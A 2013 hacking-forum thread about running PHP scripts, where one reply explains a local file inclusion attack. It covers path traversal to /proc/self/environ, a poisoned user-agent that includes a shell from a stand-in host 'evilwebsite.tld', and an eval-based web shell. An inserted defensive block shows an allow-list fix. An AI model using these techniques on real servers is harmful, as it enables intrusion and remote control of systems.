php script question


Post by HaxJester on Thu Jan 10, 2013 3:31 am

Is it possible to run php scripts without having to save them online first?

Re: php script question

Post by -Ninjex- on Thu Jan 10, 2013 3:50 am

HaxJester wrote: Is it possible to run php scripts without having to save them online first?



Of course, maybe research your question on Google first.
If you are really confused, look into Apache servers.
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.


Re: php script question

Post by weekend hacker on Thu Jan 10, 2013 6:03 am

You can run PHP in various ways on whatever machine has PHP installed. The main thing is that the code will run on a machine that has it installed; the actual location of the code doesn't matter all that much, depending on the context.
You could, for instance, install PHP on your home machine and start it from the command line like:
Code:
php somephpfile.php

Or you could also have a webserver installed with PHP support and simply go to the appropriate URL like:
Code:
http://127.0.0.1/somephpfile.php

Or on a remote server with PHP installed there could be a PHP script that includes other PHP code, and the PHP installed on that server has been configured to allow remote includes, like:
Code:
<?php include 'http://somewebsite.tld/somedir/somefile.php'; ?>

(Note that somewebsite.tld/.... needs to show the content of that PHP file and not actually run it itself. It doesn't even really need to end in .php; it might as well be a .txt.)
Or there might be some PHP code on a machine that allows you to evaluate PHP code and allows you to specify a string of PHP code like:
Code:
<?php eval($_GET['code']); ?>

Now to throw all this together into a practical example. There might be a PHP script somewhere that is vulnerable to a local file inclusion (LFI). It might look something like this:
Code:
<?php include '/usr/local/www/'.$_GET['page'].'.php';

Now we could change the 'page' GET value to whatever we want fairly easily by just going to some URL like:
Code:
http://somewebsite.tld/vulnpage.php?page=../../../proc/self/environ%00

Then the vuln page will try to include /proc/self/environ (note the null byte at the end to get rid of that pesky .php).
Now if we were to also change our user agent to something like:
Code:
<?php include 'evilwebsite.tld/somephpshell.txt'; ?>

Then the vuln page will include /proc/self/environ, which for a web process also contains the user agent, which will in turn be treated as PHP code and will include somephpshell.txt (assuming remote includes are turned on). If somephpshell.txt is the code for a random PHP shell then you now have a nice interface to whatever server had the LFI, as whatever user the webserver is running as.
Now if remote includes are not allowed then you could always turn your user agent into something like:
Code:
<?php eval($_POST['evilcodez']); ?>

And set the POST value of 'evilcodez' to the content of the shell script. Or alternatively you write a little something to get the shell script from some server (http_get() comes to mind, but if remote includes are disabled then there's a big chance that is disabled as well).

There you have it, various ways of running php in all kinds of situations with the actual code being in all kinds of different places. Hope this helped.
<Yoda> if someone says something i don't like, i ban him, ban whoever defends him, and then ban the witnesses...
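A hardened counterpart to the `include '/usr/local/www/'.$_GET['page'].'.php'` pattern from the post above, added here as an example and not part of any poster's message. The helper name `resolve_page`, the allow-list contents and the temporary directory are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Map a user-supplied page name to a file under $baseDir, or return null.
 * resolve_page() is a hypothetical helper written for this example.
 */
function resolve_page(string $page, string $baseDir, array $allowed): ?string
{
    // 1. Allow-list: only names the application knows about are accepted,
    //    so "../", NUL bytes and URL schemes never reach the filesystem.
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    // 2. Defence in depth: canonicalise the path and confirm it is still
    //    inside the base directory (catches symlinks or a sloppy allow-list).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $path === false) {
        return null;   // base directory or target file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;   // resolved outside the base directory
    }
    return $path;
}

// Constructed sample site in a temporary directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . getmypid();
@mkdir($base);
file_put_contents($base . '/home.php', "<?php echo 'home page'; ?>\n");
$allowed = ['home', 'about'];   // 'about' is listed but has no file on disk

// Constructed inputs; the second is the decoded 'page' value from the post's URL.
$inputs = ['home', "../../../proc/self/environ\0", 'http://evilwebsite.tld/x', 'about'];
foreach ($inputs as $page) {
    $path = resolve_page($page, $base, $allowed);
    $shown = json_encode($page, JSON_UNESCAPED_SLASHES);
    printf("%-36s => %s\n", $shown, $path === null ? 'rejected' : 'include ' . $path);
}

// Clean up the constructed files.
unlink($base . '/home.php');
rmdir($base);
```

Independently of the code fix, leaving `allow_url_include` at its default of `Off` in php.ini blocks the remote-include variants described in the post.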


Re: php script question

Post by Fehk on Thu Jan 10, 2013 11:59 am

On top of the numerous 'delivery methods' above, there are plenty of applications, guides and software to help you install, customize and run your own test server on your PC.

1. XAMPP, cross-platform apache/mysql/php & perl

http://www.webassist.com/support/docume ... indows.php (great all-round usage)

2. WAMP, windows apache/mysql/php

http://www.wampserver.com/en/ (apache2, easy to work with, great customization)
http://www.easyphp.org/ (very easy :p use it myself on both laptop and pc)

3. LAMP, linux apache/mysql/php

Setting up a LAMP is a bit harder, since you have to do more manual work instead of clicking 'next' & 'finish', but it's very rewarding if you do set one up.

https://help.ubuntu.com/community/ApacheMySQLPHP (for ubuntu, a 'how-to')
http://www.redips.net/linux/lamp-setup/ (same thing)